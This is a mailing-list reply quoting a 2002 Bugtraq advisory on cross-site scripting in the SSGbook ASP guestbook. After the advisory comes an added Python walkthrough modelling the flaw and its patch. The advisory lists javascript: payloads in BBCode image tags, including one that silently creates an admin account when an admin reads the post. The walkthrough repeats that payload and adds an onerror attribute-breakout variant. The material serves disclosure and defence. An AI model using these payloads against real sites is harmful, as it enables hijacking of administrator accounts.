In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com>

This issue has been fixed

>From: "Frog Man" <leseulfrog@hotmail.com>
>To: bugtraq@securityfocus.com
>Subject: SSGbook (ASP)
>Date: Tue, 08 Oct 2002 19:31:54 +0200
>Message-ID: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com>
>
>Information :
>°°°°°°°°°°°°°°
>Product : SSGbook
>Language : ASP
>Tested version : 1
>Website : http://www.script-shed.com
>Problem : Cross Site Scripting
>
>PHP Code / location :
>°°°°°°°°°°°°°°°°°°°°°
>----------------- config.asp ----------------------
>fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
>fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
>fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
>fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
>fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
>fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
>----------------- config.asp ----------------------
>
>Exploit :
>°°°°°°°°°
>[image]javascript:{SCRIPT}[/image]
>[img=right]javascript:{SCRIPT}[/img=right]
>[image=right]javascript:{SCRIPT}[/image=right]
>[img=left]javascript:{SCRIPT}[/img=left]
>[image=left]javascript:{SCRIPT}[/image=left]
>[img]javascript:{SCRIPT}[/img]
>
>
>e.g. :
>[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
>
>Adds an admin if an admin reads it. Login : Pom, Password : turlututu
>
>Patch :
>°°°°°°°
>In config.asp :
>Add this line :
>
> strOutput = Replace(strOutput, chr(34), "&quot;")
>
>after
>
>----------------------------------------------
> strOutput = Replace(strOutput, "<", "&lt;")
> strOutput = Replace(strOutput, ">", "&gt;")
>----------------------------------------------
>
>And replace these lines :
>
>
>------------------------------------------------
> fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
> fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
> fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
> fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
>------------------------------------------------
>
>
>with :
>
>------------------------------------------------
> fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
> fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
> fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
> fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
>------------------------------------------------
>
>
>
>
>More details in French :
>http://www.frog-man.org/tutos/SSGbook.txt
>
>translated by Google :
>http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
>
>
>frog-m@n
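The mechanism behind the quoted advisory and its patch, as an added example that is not part of the original post or of the SSGbook code: a Python model of the [img]/[image] BBCode-to-HTML step in config.asp. It assumes that doCode() simply wraps whatever sits between an open and a close tag with the given HTML start and end strings (the real VBScript helper is not shown in the post), and that the output encoding runs before the BBCode pass. The `do_code`, `render_original`, `render_patched`, `src_urls` and `has_script_url` names and the sample posts are constructed here for illustration.

```python
import re

# Added example (not code from the SSGbook project or the post): a Python
# model of the BBCode-to-HTML step described in the advisory, showing why
# [image]javascript:...[/image] yields a script-capable <img src> and how
# the posted patch (mandatory "http://" prefix plus quote encoding) stops it.
# Assumption: doCode() in config.asp replaces each open/close tag pair with
# the given HTML start/end strings; the real VBScript helper is not on the page.

def do_code(text, open_tag, close_tag, html_start, html_end):
    """Mimic doCode(): wrap whatever sits between open_tag and close_tag."""
    pattern = re.escape(open_tag) + r"(.*?)" + re.escape(close_tag)
    return re.sub(pattern, lambda m: html_start + m.group(1) + html_end,
                  text, flags=re.S)

# The six [img]/[image] rules quoted from config.asp, pre-patch.
IMG_RULES = [
    ("[img]", "[/img]", '<img src="', '" border=0>'),
    ("[image]", "[/image]", '<img src="', '" border=0>'),
    ("[img=right]", "[/img=right]", '<img align=right src="', '" id=right border=0>'),
    ("[image=right]", "[/image=right]", '<img align=right src="', '" id=right border=0>'),
    ("[img=left]", "[/img=left]", '<img align=left src="', '" id=left border=0>'),
    ("[image=left]", "[/image=left]", '<img align=left src="', '" id=left border=0>'),
]

def encode_original(s):
    """Pre-patch output encoding shown in the post: only < and > are escaped."""
    return s.replace("<", "&lt;").replace(">", "&gt;")

def encode_patched(s):
    """Post-patch encoding: the added chr(34) -> &quot; line."""
    return encode_original(s).replace('"', "&quot;")

def render_original(post):
    """Vulnerable pipeline (assumption: encoding runs before the BBCode pass,
    otherwise the generated <img> tags would themselves be escaped)."""
    out = encode_original(post)
    for rule in IMG_RULES:
        out = do_code(out, *rule)
    return out

def render_patched(post):
    """Patched pipeline: each rule now requires a literal http:// right after
    the open tag and emits it right after src=", so the poster no longer
    chooses the URL scheme, and a " in the URL can no longer end the attribute."""
    out = encode_patched(post)
    for open_tag, close_tag, html_start, html_end in IMG_RULES:
        out = do_code(out, open_tag + "http://", close_tag,
                      html_start + "http://", html_end)
    return out

def src_urls(rendered):
    """Crude extraction of <img src="..."> values, for checking the output."""
    return re.findall(r'<img[^>]*\ssrc="([^"]*)"', rendered)

def has_script_url(rendered):
    """True if any rendered <img> carries a javascript: URL (the post's vector)."""
    return any(u.strip().lower().startswith("javascript:") for u in src_urls(rendered))

if __name__ == "__main__":
    # Constructed sample posts: the advisory's payload plus two variants.
    payload = ('[image]javascript:document.location="ss_admin.asp?Mode=Update'
               '&Acton=Access&UserName=Pom&Password=turlututu";[/image]')
    breakout = '[img]http://x" onerror="alert(1)[/img]'
    benign = '[img=left]http://example.com/a.png[/img=left]'
    for label, post in (("payload", payload), ("breakout", breakout), ("benign", benign)):
        print(label, "original:", render_original(post))
        print(label, "patched :", render_patched(post))
        print(label, "script URL before/after:",
              has_script_url(render_original(post)), has_script_url(render_patched(post)))
```

The two halves of the posted patch do different jobs: the `http://` prefix pins the scheme of every generated `src`, which is what defeats the `javascript:` payload, while the `chr(34)` to `&quot;` replacement is what keeps a `"` inside the URL from terminating the attribute and smuggling in an event handler. The `src_urls` / `has_script_url` checks are plain string matching on the model's output, not an HTML parser, and are only meant to make the before/after difference visible.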